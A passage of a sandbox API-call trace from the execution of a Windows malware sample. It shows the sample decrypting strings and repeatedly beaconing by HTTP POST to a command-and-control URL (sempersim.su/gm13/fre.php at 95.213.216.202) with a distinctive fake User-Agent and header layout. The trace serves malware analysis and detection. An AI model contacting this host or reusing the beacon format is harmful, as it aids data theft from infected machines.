pdwDataLen=0x19fcfc) returned 1 [0193.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.290] CryptDestroyKey (hKey=0x62d710) returned 1 [0193.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.291] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0193.291] GetProcessHeap () returned 0x620000 [0193.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0193.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.293] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0193.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.293] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0193.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.294] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0193.294] GetProcessHeap () returned 0x620000 [0193.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0193.294] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0193.298] GetProcessHeap () returned 0x620000 [0193.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4e0 [0193.298] socket (af=2, type=1, protocol=6) returned 0x354 [0193.298] connect (s=0x354, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0193.353] FreeAddrInfoW (pAddrInfo=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0193.353] GetProcessHeap () returned 0x620000 [0193.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0193.353] GetProcessHeap () returned 0x620000 [0193.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0193.354] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0193.355] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0193.355] GetProcessHeap () returned 0x620000 [0193.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0193.356] GetProcessHeap () returned 0x620000 [0193.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0193.356] GetProcessHeap () returned 0x620000 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0193.356] GetProcessHeap () returned 0x620000 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0193.357] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0193.358] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0193.358] GetProcessHeap () returned 0x620000 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0193.358] GetProcessHeap () returned 0x620000 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0193.358] send (s=0x354, buf=0x63a880*, len=237, flags=0) returned 237 [0193.359] send (s=0x354, buf=0x6421e0*, len=159, flags=0) returned 159 [0193.359] GetProcessHeap () returned 0x620000 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0193.359] recv (in: s=0x354, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0195.114] GetProcessHeap () returned 0x620000 [0195.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0195.114] GetProcessHeap () returned 0x620000 [0195.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0195.115] GetProcessHeap () returned 0x620000 [0195.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0195.115] GetProcessHeap () returned 0x620000 [0195.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0195.115] closesocket (s=0x354) returned 0 [0195.116] GetProcessHeap () returned 0x620000 [0195.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e0 | out: hHeap=0x620000) returned 1 [0195.116] GetProcessHeap () returned 0x620000 [0195.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0195.117] GetProcessHeap () returned 0x620000 [0195.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0195.117] GetProcessHeap () returned 0x620000 [0195.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0195.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb50) returned 0x354 [0195.121] Sleep (dwMilliseconds=0xea60) [0195.136] GetProcessHeap () returned 0x620000 [0195.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0195.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.137] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0195.157] GetProcessHeap () returned 0x620000 [0195.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0195.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.159] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0195.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.160] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.161] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.162] GetProcessHeap () returned 0x620000 [0195.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0195.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.164] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0195.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.169] CryptDestroyKey (hKey=0x62d710) returned 1 [0195.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.170] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0195.170] GetProcessHeap () returned 0x620000 [0195.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0195.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.171] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.172] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.173] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.174] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.174] GetProcessHeap () returned 0x620000 [0195.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0195.174] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.174] GetProcessHeap () returned 0x620000 [0195.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0195.175] GetProcessHeap () returned 0x620000 [0195.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0195.176] GetProcessHeap () returned 0x620000 [0195.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0195.176] GetProcessHeap () returned 0x620000 [0195.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0195.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.177] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0195.194] GetProcessHeap () returned 0x620000 [0195.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0195.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.195] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0195.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.196] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.197] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.197] GetProcessHeap () returned 0x620000 [0195.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0195.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.202] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0195.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.203] CryptDestroyKey (hKey=0x62d710) returned 1 [0195.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0195.204] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0195.204] GetProcessHeap () returned 0x620000 [0195.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0195.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.205] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0195.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.206] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0195.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0195.207] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0195.207] GetProcessHeap () returned 0x620000 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0195.207] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c140*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0195.209] GetProcessHeap () returned 0x620000 [0195.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0195.209] socket (af=2, type=1, protocol=6) returned 0x358 [0195.209] connect (s=0x358, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0195.260] FreeAddrInfoW (pAddrInfo=0x63c140*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0195.260] GetProcessHeap () returned 0x620000 [0195.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0195.260] GetProcessHeap () returned 0x620000 [0195.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0195.261] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0195.262] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0195.262] GetProcessHeap () returned 0x620000 [0195.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0195.262] GetProcessHeap () returned 0x620000 [0195.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0195.263] GetProcessHeap () returned 0x620000 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0195.263] GetProcessHeap () returned 0x620000 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0195.263] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0195.264] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0195.264] GetProcessHeap () returned 0x620000 [0195.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0195.264] GetProcessHeap () returned 0x620000 [0195.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0195.265] send (s=0x358, buf=0x63a880*, len=237, flags=0) returned 237 [0195.265] send (s=0x358, buf=0x6421e0*, len=159, flags=0) returned 159 [0195.266] GetProcessHeap () returned 0x620000 [0195.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0195.266] recv (in: s=0x358, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0196.638] GetProcessHeap () returned 0x620000 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0196.639] GetProcessHeap () returned 0x620000 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0196.639] GetProcessHeap () returned 0x620000 [0196.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0196.639] GetProcessHeap () returned 0x620000 [0196.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0196.640] closesocket (s=0x358) returned 0 [0196.641] GetProcessHeap () returned 0x620000 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0196.641] GetProcessHeap () returned 0x620000 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0196.641] GetProcessHeap () returned 0x620000 [0196.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0196.641] GetProcessHeap () returned 0x620000 [0196.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0196.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x77c) returned 0x358 [0196.643] Sleep (dwMilliseconds=0xea60) [0196.656] GetProcessHeap () returned 0x620000 [0196.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642dc8 [0196.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.658] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0196.679] GetProcessHeap () returned 0x620000 [0196.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0196.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.680] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0196.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.681] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.690] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.690] GetProcessHeap () returned 0x620000 [0196.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0196.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.692] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642dc8, pdwDataLen=0x19fcfc | out: pbData=0x642dc8, pdwDataLen=0x19fcfc) returned 1 [0196.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.694] CryptDestroyKey (hKey=0x62d190) returned 1 [0196.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.695] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0196.695] GetProcessHeap () returned 0x620000 [0196.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0196.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.696] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.697] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.712] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.717] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.717] GetProcessHeap () returned 0x620000 [0196.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0196.717] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.717] GetProcessHeap () returned 0x620000 [0196.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0196.717] GetProcessHeap () returned 0x620000 [0196.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0196.718] GetProcessHeap () returned 0x620000 [0196.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0196.718] GetProcessHeap () returned 0x620000 [0196.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0196.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.720] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0196.748] GetProcessHeap () returned 0x620000 [0196.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0196.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.750] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0196.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.751] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.753] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.753] GetProcessHeap () returned 0x620000 [0196.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0196.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.754] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0196.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.756] CryptDestroyKey (hKey=0x62d710) returned 1 [0196.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0196.757] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0196.757] GetProcessHeap () returned 0x620000 [0196.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645630 [0196.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.758] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0196.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.759] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0196.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0196.764] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0196.764] GetProcessHeap () returned 0x620000 [0196.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0196.764] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bf38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0196.766] GetProcessHeap () returned 0x620000 [0196.766] RtlAllocateHeap 